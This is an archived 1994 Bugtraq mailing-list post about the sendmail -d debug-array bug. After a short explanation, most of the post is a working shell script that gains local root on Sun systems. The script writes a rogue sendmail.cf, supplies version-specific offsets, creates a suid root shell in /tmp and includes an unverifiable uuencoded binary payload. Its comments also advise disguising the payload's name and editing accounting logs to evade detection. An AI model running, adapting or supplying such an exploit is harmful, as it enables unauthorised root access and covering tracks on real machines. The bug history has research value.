Bugtraq mailing list archives
Re: Latest sendmail bug?
From: widnerm () hsd utc com (Michael R. Widner)
Date: 20 Jul 1994 10:17:04 -0400 (EDT)
In a previous message, Doug McLaren said:
| > Does anyone have an exploit script we can use to test yet? | > The worst bug exploits sendmail -d and can be used to gain root | > according to CERT. | | an exploit script was posted to this list a few months back. Um, I checked and never found said script.
The last sendmail -d hole script was posted somewhere back around March I believe. I've seen several different varieties, each of which has it's strong points and weaknesses as an exploit script. The important thing to know is that if your sendmail crashes when you pass it something like -d387654321 then it can most likely be expoited to gain root access. Without going into much detail, -dx.y writes y into the debug array as array[x]=y. Range checking is not performed properly on x, so it's possible to pass negative integers that pass the range check. Find a key location before the debug array, over write it, and you're in business. The problem in trying to create a generic script is that the 'key' locations have different offsets from the debug array for every version of sendmail. Sometimes they're easy to locate if you can get a core, but sometimes it is tough to get a core w/o already being root. Also, sometimes a core tells you nothing. The following script is Sun specific, and patches are now available for all versions of Sun sendmail. The script creates a suid root owned copy of /bin/sh and places it in /tmp. If you're hacking solaris, I'd suggest you choose some program other than /bin/sh. For the curious and paranoid, the uuencoded script is a compiled, compressed, and uuencoded version of the following c prog, compiled under sunos. main() { setuid(0); chown("/tmp/newsh", 0, 0); chmod("/tmp/newsh", 04755); exit(0); } I put it in this way because solaris lacks a bundled compiler. Of course, I may be lying. It may really be a uuencoded program that does main() { unlink("/");}, but you'll just have to trust me. I should point out that Sun sendmail is in no way unique in it's vulnerability to this hole. It's also worth noting, for Solaris administrators and hackers, that the normal Solaris patch procedure will leave the old (pre-patched) versions of sendmail in their broken and SUID state under /var/sadm/patch. This should be fixed, if you haven't done it already. -- Michael R. Widner <widnerm () hsd utc com> --------------------------- #!/bin/sh # This script takes advantage of sendmail's (mis)interpretation of # very large unsigned ints as signed ints when accessing the debug # array. As it, it will work with the 8 versions of sun sendmail # that I have access to. Perhaps I'll update it if I find new # versions of sun sendmail. # NOTE: This is a Sun specific script. Don't expect it to work with # any non-sun sendmail. # -Michael R. Widner (atreus) 3/25/94 # # usage: smdhole [/path/to/suid/sendmail] # # add /usr/ucb to path so solaris can find `whoami` (4/18/94) path=$path:/usr/ucb if [ $1x = x ]; then sendmail=/usr/lib/sendmail else echo "Trying to abuse $1." sendmail=$1 fi sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g` # prefix and suffix for -1 as unsigned integer. Actually, this is # off by two. you figure out why. prefix=42949 suffix=67297 case $sm_size in 132064) n1=${prefix}52864 n2=${prefix}52865 n3=${prefix}52866 echo Patched solaris w/o mx. ;; 134752) # ug! dropped a 0 before. fixed 4/18/94 n1=${prefix}01656 n2=${prefix}01657 n3=${prefix}01658 echo Patched solaris sendmail.mx ;; 130860) n1=${prefix}53016 n2=${prefix}53017 n3=${prefix}53018 echo Un-patched solaris w/o mx. ;; 133548) # ug! dropped a 0 before. fixed 4/18/94 n1=${prefix}01808 n2=${prefix}01809 n3=${prefix}01810 echo Un-patched solaris sendmail.mx ;; 139264) n1=${prefix}49609 n2=${prefix}49610 n3=${prefix}49611 echo Sun 4.1.3 sendmail - could be either of two versions n4=${prefix}49265 n5=${prefix}49266 n6=${prefix}49267 ;; 155648) n1=${prefix}46953 n2=${prefix}46954 n3=${prefix}46955 echo Sun 4.1.3 sendmail.mx - could be either of two versions n4=${prefix}46609 n5=${prefix}46610 n6=${prefix}46611 ;; *) echo "I don't know what version of sendmail $sendmail is." echo -n "Look for other versions of sendmail[.mx] on the " echo "system and re-run this as:" echo " $0 /path/to/another/suid/sendmail" echo echo "Let me see if I can suggest anything..." find /usr/lib /var/sadm/patch -name "*sendm*" -perm -4001 -ls 2>/dev/null exit 1 ;; esac cat << EOM > /tmp/sendmail.cf DMether DRlocalhost CRlocalhost CDMailer-Daemon root daemon uucp DlFrom \$g \$d Do.:%@!^=/[] Dq\$g\$?x (\$x)\$. De\$j nothing OA./aliases OF0666 Og1 OL0 Oo OPPostmaster OQ. Os Ou1 T root daemon uucp H?F?From: nobody Mlocal, P=/tmp/in.telnet, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u Mprog, P=/tmp/in.telnet, F=lsDFMeuP, S=10, R=20, A=sh -c \$u S0 R\$+ \$#local \$:\$1 just rewrite EOM cat $0 | sed "s:atreus::" | uudecode uncompress /tmp/in.telnet.Z chmod 755 /tmp/in.telnet mkdir /tmp/mail cp /tmp/sendmail.cf /tmp/mail cp /bin/sh /tmp/newsh chmod 666 /tmp/newsh $sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami` <<EOF test EOF if [ -x /tmp/newsh ]; then echo "Had the right offset for sendmail.cf. Here's the result:" else echo "Looks like I had the wrong sendmail.cf offset. Fuckers." if [ ${n4}x = x ]; then echo "This version isn't what I thought it was." echo "Look for other suid sendmails and try this on them." else echo "I'm taking another stab with a different offset." $sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <<EOF test EOF echo "Here's the result:" fi fi rm /tmp/in.telnet rm -r /tmp/mail rm /tmp/sendmail.cf ls -l /tmp/newsh exit # I'm calling this in.telnet for one reason. It shows up in the acct logs # as being run by root. It will attract less attention if it's something # normally run by root. An alert admin will catch is anyway, because # in.telnet is normally not associated with a tty. The obvious fix, if you # want to go undetected, would be to modify the acct files once you've # become root. begin 775 /tmp/in.telnet.Z M'YV0@08$6 (B"!A$J5 CBX,*"O" <A#8 %!!)%8E44@%" "4!H A\!*+@atreus M0D$(U$2 S:@( )A ,0@ 0)0 !@ 0"( 02$$%/ OZ1+"S9T%'G$: C%4atreus MH%&B00%T&O<+S0N7KBJ(0Q'!)20)(ACX!+!$DD0 K" 0( 1%)>Q2RA)! %(atreus M5$,).9]$%38!E!= H,(LP$LV*KJ*8(15)".N(AI2!6Q*(@ HPM6U6<4A@716atreus M+H@"%QQ:D@!. ":U%L;2T'36E%H$D 0 H"!ML><#H0N.!B?A-(#4!5>PGGT9atreus M068Z7==^%;%A[ BS!U6]5@P*#4V;. $L*)YY,P%@$LP"B' [-X#=O=56&'N!atreus M]4'J<$(""V!.*1]U2@&Q4TJHY5J8,@FC%"+^00 3&, (" HC_B$@" 1@D*$@atreus M))R!$, GQ!0$'1^!' ,. H&@<U).!CSX&00Y$6#B$2@"((") T0"S4$*I!A5atreus M(,-\&%6% DA2 #@$4%, , "82(",!U7XAXD!(&G4"W7,(<<+;*0A!I5DN##'atreus M&P"\0$89=KR@1QER</E0!F/(00<,.H#@QAL@0"DEE59BJ>4;"CP$@ EIKMFFatreus MG%-6>24;66X)0AMAP %'&FZ< 8(98:3!1AURE)'G0A3TR::;<'H)IIADXKG0atreus M"W2T <<+;I1QQQQH%#35+Y",%40(+OET@!X5 @ )!2) AT MN;AF:Z\Q@K atreus M 7F8E4([MJZ1:X<?AOC0JY DAY( ((!3UR__$-: )!)D"XT 8%!FEXLY)3"Latreus M)>02\*LD[8X+Q )U'20!M_U\!$H DDB24W8*6"M*N."$H@(8 D!#P'B?P&03atreus M0J 0\@,_,N"K\'C0@BBB5%15>Y(TV')3%QCH I *.%R<S$ #1<4$@@$K%POatreus M /?^LT]4R<$&%CBV(O%KQM)R#.L$)XT+!C,S$T9 A0'\\<\_YT CPM% ;_P0atreus M$&P41( E3_^3(;!X%)0 UT_3(A0A!15 ]C^L"%43 VLO3$0G!2TP-K8"(7*atreus M3VLS(Y39 #BP-A,(^0> 0BI51#1!36 $ 4(1>7X0Y$5)%M!!R"TL$L(50[ atreus MI8<CE !"F1?D $((($20V @Q@!#HBFN'T .M(Y1<X'K2_M#M$B#4^T.,8ZHGatreus M )$=P$A!)R!!>N8&A"-4WJ:/7H#?P%H]060%G&Z00P!DP-, 8NA9 D\&B*,Gatreus M"Y$-X$=!(M1=D R9%R"'4$06M$/F!^0@E$)%? ^*GDO@R0% IQ I") %>LI"atreus M9 A@BH*,@!0("0-/B**G-)"/#GJ20^9,(Q1H((00HSM ')Z'D$F,3@#3$ HXatreus M$"**R!@@#P[$ D)JX<)$L&^%!4%&_/X'+&1\H0QT* ,>,/A#,H2!#F$ P _=atreus M0 8 S &):G(B%.GP!3.PX0U'5.(/\9 &(B**44HL@QOLD(8RN4&+1,B"$X+0atreus MA"0,(8Q<).(8T-"&-S3Q"W-\PQW.^(4^?I&/<P!B'=)PQS>X88M=U*(0N_@%atreus M,M2A#6W(0R/+,(:L]?$+0Z#"$Z3P!28D80I4Z*,6OT $37+2DZ 4Y27)\(8Oatreus MG.&*8@@#&_!(AS?(80ZC9*4K82G+1M;REHJ,8R,?&<DO5,H,PWM!&<I ACG8atreus M84ID2,,<UC #*KUA#+*DTY7.,(8QM$!0+Y@#',(@!V_.H0YN:,$YWS0'&K@@atreus M!BZHI@Q<4(-XZD"9S'0F-*5)36MBDPW:'-X!Z**0"6).<0<004XB]Y Q ( ,atreus M61N>1"=*T8I:]*(8S:A&-\K1CGKTHR -J4A'2M*2FO2D*$VI2E?*TI:Z]*4Patreus MC:E,9TK3FMKTICC-J4YWRM.>^O2G0 VJ4(=*U*(:]:A(3:I2E\K4ICKUJ5"-atreus MJE2G2M6J6O6J6,VJ5K?*U:YZ]:M@#:M8QTK6LIKUK&A-JUK7RM:VNO6M<(VKatreus M7.=*U[K:]:YXS>M2_0,$UP&+!"<MW>'V!BPN"(5D !B !W4"6)U0;R&5*P Ratreus M$()#[@$ L3XQ7"" 0;*HO H43OL'/SQ+%= ^+1]!"<!G0VN/H A@M4^;1U &atreus M -M_P",H!*AM.X)2@-JJ(RB(DR@0%JO7XAKWN,A-KG*7R]SF.O>YT(VN=*=+atreus MW>I:][K8S:YVM\O=[GKWN^ -KWC'2][RFO>\Z$VO>M?+WO:Z][WPC:]\YTO?atreus +^MKWOOC-KW[WFUS=atreus atreus endatreus
Current thread:
- Re: Latest sendmail bug? Bennett Todd (Jul 15)
- <Possible follow-ups>
- Re: Latest sendmail bug? Timothy Newsham (Jul 15)
- Re: Latest sendmail bug? Doug McLaren (Jul 19)
- Re: Latest sendmail bug? Michael R. Widner (Jul 20)
- Re: Latest sendmail bug? Timothy Newsham (Jul 22)